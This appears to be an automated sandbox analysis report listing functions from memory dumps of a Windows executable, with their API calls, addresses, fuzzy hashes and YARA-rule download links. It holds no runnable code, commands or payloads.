Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _wcscpy$_wcscat
String ID:
API String ID: 2037614760-0
Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction ID: aae8ad1089ab62f33586ea1ff987916b1d6bf903ae6cd739e2bdf951f3c3f497
Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction Fuzzy Hash: 735110B1E04125AACB11AF99D0409FEB7B1EF14314F50844BF581AB291EB7C5AC2D79D

Uniqueness

Uniqueness Score: -1.00%

Function 004454E0, Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044552E
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00445579
IsMenu.USER32(00000000), ref: 00445599
CreatePopupMenu.USER32 ref: 004455CD
GetMenuItemCount.USER32(000000FF), ref: 0044562B
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0044565C

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 9149c753d21dbe4c7453d8a2764a7354dc5a2c959dde9e744289eb95a39e3424
Instruction ID: 30880efebb32068d972c1b621df023eec3e0be8427943114a83c9032a8b30d18
Opcode Fuzzy Hash: 9149c753d21dbe4c7453d8a2764a7354dc5a2c959dde9e744289eb95a39e3424
Instruction Fuzzy Hash: B751E570600A09EFFF10CF68D888BAEBBF5AF15318F50412EE4199B392D3789945CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041B18C, Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

BeginPaint.USER32(?,?,?,?,?,?), ref: 0041B1C1
GetWindowRect.USER32(?,?), ref: 0041B225
ScreenToClient.USER32(?,?), ref: 0041B242
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0041B253
EndPaint.USER32(?,?), ref: 0041B29D

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 20808c8f105cc3c169cf5d86214a4c39d4399ee9711ac9fe19639029ce038075
Instruction ID: cb1216815f054f7bfe4ddaad3dd02a94c3671c3071c030ea16daf7de2dc947cb
Opcode Fuzzy Hash: 20808c8f105cc3c169cf5d86214a4c39d4399ee9711ac9fe19639029ce038075
Instruction Fuzzy Hash: 9941A471504201AFC711EF15DC88FAA7BE8EF46324F14057EF995872B2C7349849DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0046E1A7, Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004C1810,00000000,?,?,004C1810,004C1810,?,0047E2D6), ref: 0046E21B
EnableWindow.USER32(00000000,00000000), ref: 0046E23F
ShowWindow.USER32(004C1810,00000000,?,?,004C1810,004C1810,?,0047E2D6), ref: 0046E29F
ShowWindow.USER32(00000000,00000004,?,?,004C1810,004C1810,?,0047E2D6), ref: 0046E2B1
EnableWindow.USER32(00000000,00000001), ref: 0046E2D5
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0046E2F8

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ecaf9c3e78307666f6cbe741466c22ac14d5a29273a99620dfaa4e5a6c1ae1f4
Instruction ID: 7711cc01bbb307f0fbe98c9b2fb6952cadfbe6a74c324be6bc63d37bb36d97e7
Opcode Fuzzy Hash: ecaf9c3e78307666f6cbe741466c22ac14d5a29273a99620dfaa4e5a6c1ae1f4
Instruction Fuzzy Hash: 45419238601244EFDB26CF15C4A9B957BE6BF06314F1841FBEA488F2A2D735E841CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0046E9C8, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0041B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041B5EB
Part of subcall function 0041B58B: SelectObject.GDI32(?,00000000), ref: 0041B5FA
Part of subcall function 0041B58B: BeginPath.GDI32(?), ref: 0041B611
Part of subcall function 0041B58B: SelectObject.GDI32(?,00000000), ref: 0041B63B

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0046E9F2
LineTo.GDI32(00000000,00000003,?), ref: 0046EA06
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046EA14
LineTo.GDI32(00000000,00000000,?), ref: 0046EA24
EndPath.GDI32(00000000), ref: 0046EA34
StrokePath.GDI32(00000000), ref: 0046EA44

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: b3af3d5d25e0f85826e0ff72675f785b7828cffa47172d1414268e23a74b13dd
Instruction ID: 8927a1eab3057214f1595f1b84a3c17f83830bd9733363ac05647c9e9e35af78
Opcode Fuzzy Hash: b3af3d5d25e0f85826e0ff72675f785b7828cffa47172d1414268e23a74b13dd
Instruction Fuzzy Hash: 0D113576400149BFEF029F90DC88EAA7FADEB09364F048426FE099A1A0D7719D55DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401867, Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00401898
MapVirtualKeyW.USER32(00000010,00000000), ref: 004018A0
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004018AB
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004018B6
MapVirtualKeyW.USER32(00000011,00000000), ref: 004018BE
MapVirtualKeyW.USER32(00000012,00000000), ref: 004018C6

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9a5a7214b1ea0b0b780c19c63d544ac2e7be13cced7f3f00c2b1760146db41f7
Instruction ID: df06832e520ab1ebd763a673813ef49b1cb2b7c3f93c06919bb661d3bd101702
Opcode Fuzzy Hash: 9a5a7214b1ea0b0b780c19c63d544ac2e7be13cced7f3f00c2b1760146db41f7
Instruction Fuzzy Hash: E30144B0902B5ABDE3008F6A8C85B56FFA8FF19354F04411BA15C47A82C7B5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0044A3D2, Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: dbfb78af61992f87012e477ae148dca11e06756eacb427df549c3185a69d60fa
Instruction ID: 30c5cc87d49b7d3689fa1c73e76fedb95a802dd06d50e9b1c62cebdbad079453
Opcode Fuzzy Hash: dbfb78af61992f87012e477ae148dca11e06756eacb427df549c3185a69d60fa
Instruction Fuzzy Hash: 96018136542211ABE7152F58ED88DEF777AFF89712B00097EF903921A1DB68AC10CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044A31D, Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 0044A330
RtlEnterCriticalSection.NTDLL(?), ref: 0044A341
TerminateThread.KERNEL32(?,000001F6,?,?,?,004766D3,?,?,?,?,?,0040E681), ref: 0044A34E
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,004766D3,?,?,?,?,?,0040E681), ref: 0044A35B

Part of subcall function 00449CCE: CloseHandle.KERNEL32(?,?,0044A368,?,?,?,004766D3,?,?,?,?,?,0040E681), ref: 00449CD8

InterlockedExchange.KERNEL32(?,000001F6), ref: 0044A36E
RtlLeaveCriticalSection.NTDLL(?), ref: 0044A375

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 523914c704832f3ac47a4b6a7543d358e5a83fb5c21085e8c94b606f8a946d36
Instruction ID: 822d3bbc731e6a84cd774dba9e9913f2b554d3288e5b852451200957789bce6c
Opcode Fuzzy Hash: 523914c704832f3ac47a4b6a7543d358e5a83fb5c21085e8c94b606f8a946d36
Instruction Fuzzy Hash: 05F0BE32842201ABE3112F64EC8CDDF7B7AEF89312F00087AF602910E0DBB49810CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C320, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0040C419
ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00446653,?,?,00000000), ref: 0040C495

Strings

SfD, xrefs: 004748B8, 0047487C, 00474839

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: FileRead_memmove
String ID: SfD
API String ID: 1325644223-3551330387
Opcode ID: c9c1a993eff7c2b3c765ccd33e44f24541efb18f44bddb8f149fe62d45e2de31
Instruction ID: 2ead895a6b74e7b44ccf0be4ef8d880038ecfefac732ec2a7e2a1006ddfacc32
Opcode Fuzzy Hash: c9c1a993eff7c2b3c765ccd33e44f24541efb18f44bddb8f149fe62d45e2de31
Instruction Fuzzy Hash: A6A1B270A04619EBDB00CF55C8847BDF7B0FF05300F14C6AAE859AA291D739D961DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D7C7, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0042010A: _malloc.LIBCMT ref: 00420122

Part of subcall function 0042010A: std::exception::exception.LIBCMT ref: 0042013E
Part of subcall function 0042010A: __CxxThrowException@8.LIBCMT ref: 00420153

Part of subcall function 0040CAEE: _memmove.LIBCMT ref: 0040CB2F

Part of subcall function 0040BBD9: _memmove.LIBCMT ref: 0040BC33

__swprintf.LIBCMT ref: 0041D98F

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0041D832

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _memmove$Exception@8Throw__swprintf_mallocstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 865004172-557222456
Opcode ID: 713c2bf4f24a70c89cc6b5598a7cc54376263ee8701901d841390d04ed5ca8b4
Instruction ID: bbfb05b625bc0bab9976726b6f34b2b356caf23c2f393738ab91ab11bbe7f64a
Opcode Fuzzy Hash: 713c2bf4f24a70c89cc6b5598a7cc54376263ee8701901d841390d04ed5ca8b4
Instruction Fuzzy Hash: 5E918C719182019FC714EF25C885DABB7B4EF85704F00496FF48AA72A2DA38ED45CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00445A25, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00445A93
GetMenuItemInfoW.USER32 ref: 00445AAF
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00445AF5
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C18F0,00000000), ref: 00445B3E

Strings

0, xrefs: 00445A8B

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 5024bbc546635c3fffcc42cb33b53f85e96d6187583331e20e6bc58f49c8a4cb
Instruction ID: df6257abf9c106af1c2e397cfa84bfb0d7ce3132ea3b43d3a6696c833c59557b
Opcode Fuzzy Hash: 5024bbc546635c3fffcc42cb33b53f85e96d6187583331e20e6bc58f49c8a4cb
Instruction Fuzzy Hash: 64419171604741AFEB10DF25D884B1BB7E4EF88314F04466EF9A59B3D2D774A800CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004038E4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0047454E

Part of subcall function 00407E53: _memmove.LIBCMT ref: 00407EB9

_memset.LIBCMT ref: 00403965
_wcscpy.LIBCMT ref: 004039B5
Shell_NotifyIconW.SHELL32(00000001,?), ref: 004039C6

Strings

Line: , xrefs: 00474578

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 0555be8cceecd88bcbc7e1c4cca3ed035cf2d0745b87bb7e4ea9050693d520ab
Instruction ID: 091ba514f8a43f0aa61cafe1bb3f8e225dd49c45ce14a8d0aa004b45730f11d8
Opcode Fuzzy Hash: 0555be8cceecd88bcbc7e1c4cca3ed035cf2d0745b87bb7e4ea9050693d520ab
Instruction Fuzzy Hash: 3331C0B1408340ABD321EF21CC41FDB7BECAB45315F40452FB188A21E1DB78AA48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0046DE72, Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0046DFE5
SendMessageW.USER32(?,000000B0,?,?), ref: 0046E01D
IsDlgButtonChecked.USER32(?,00000001), ref: 0046E058
GetWindowLongW.USER32(?,000000EC), ref: 0046E079
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0046E091

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 3318244b9c536bf7476213a8af297b21d2c1fbe28bd60e91c84e00cc67851645
Instruction ID: 4b6092664ab585d3ba6d3cb472fb842cd03cb9ea625e4885a721f971f1652bf4
Opcode Fuzzy Hash: 3318244b9c536bf7476213a8af297b21d2c1fbe28bd60e91c84e00cc67851645
Instruction Fuzzy Hash: 7C61A079F04204AFDB28DF54C850FAB77B5AF46300F1484AEF556973A1E739A940CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00433D46, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00433D52

Part of subcall function 004245EC: __FF_MSGBANNER.LIBCMT ref: 00424603
Part of subcall function 004245EC: __NMSG_WRITE.LIBCMT ref: 0042460A
Part of subcall function 004245EC: RtlAllocateHeap.NTDLL(00B50000,00000000,00000001), ref: 0042462F

_free.LIBCMT ref: 00433D65

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 758bf2da4fa07575816ebd8a4ab2b6c2daea4eb3ff52b29f6e25d66d1c86ab88
Instruction ID: dde75361a264e15870c35cc8613ee2918a8365c76c6a6dbe8e686f6a3d990a59
Opcode Fuzzy Hash: 758bf2da4fa07575816ebd8a4ab2b6c2daea4eb3ff52b29f6e25d66d1c86ab88
Instruction Fuzzy Hash: D611EB32A01221ABDB213F71BC0476E3B987F48365F50553FF9498A291DF3C8940865D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B58B, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041B5EB
SelectObject.GDI32(?,00000000), ref: 0041B5FA
BeginPath.GDI32(?), ref: 0041B611
SelectObject.GDI32(?,00000000), ref: 0041B63B

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 8a8077de4f5028e34100b18fbfc03b4d42f12fd47cd9b75da8c25c2c8dbd453c
Instruction ID: d1bbf679dbc285e8df5fe620988b955c4cfcdb0320b3c379566b742db2e6ab23
Opcode Fuzzy Hash: 8a8077de4f5028e34100b18fbfc03b4d42f12fd47cd9b75da8c25c2c8dbd453c
Instruction Fuzzy Hash: E2219A70804345EBCB10BF15ED48BEA7BA9FB12329F10413BE410922B2C37988D58BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00448355, Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00448371
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0044837F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00448387
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00448391
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004483CD

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 9d84c609d1b3613e70a770e080addb4adff1ccbc2652c34b3b2e9906cb3b7fe0
Instruction ID: 7266c5eef112999a441c00fc5297cfb8808fc44b901cc5ed4cdd457dfa1b221e
Opcode Fuzzy Hash: 9d84c609d1b3613e70a770e080addb4adff1ccbc2652c34b3b2e9906cb3b7fe0
Instruction Fuzzy Hash: E4012D31D01619DBDF00AFE4ED4CADEBB78FF08B01F00055AE941B2190DF79955087A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B517, Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0041B526
StrokeAndFillPath.GDI32(?,?,0047F583,00000000,?), ref: 0041B542
SelectObject.GDI32(?,00000000), ref: 0041B555
DeleteObject.GDI32 ref: 0041B568
StrokePath.GDI32(?), ref: 0041B583

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: c0ed36fbea84ccbf657b42e2c82634121d9bd66d979e960fc4b86a194a818b30
Instruction ID: 9663be42d44b00f62fecb98a691a1c5bea4c3fe9791a361a84769b689d297f8c
Opcode Fuzzy Hash: c0ed36fbea84ccbf657b42e2c82634121d9bd66d979e960fc4b86a194a818b30
Instruction Fuzzy Hash: 99F01D30005244ABC7516F25EC0CB993FE2EB02326F048225E495441F1C7344999DF6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA5A, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

#, xrefs: 0041DA9D
+, xrefs: 0041DA96

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
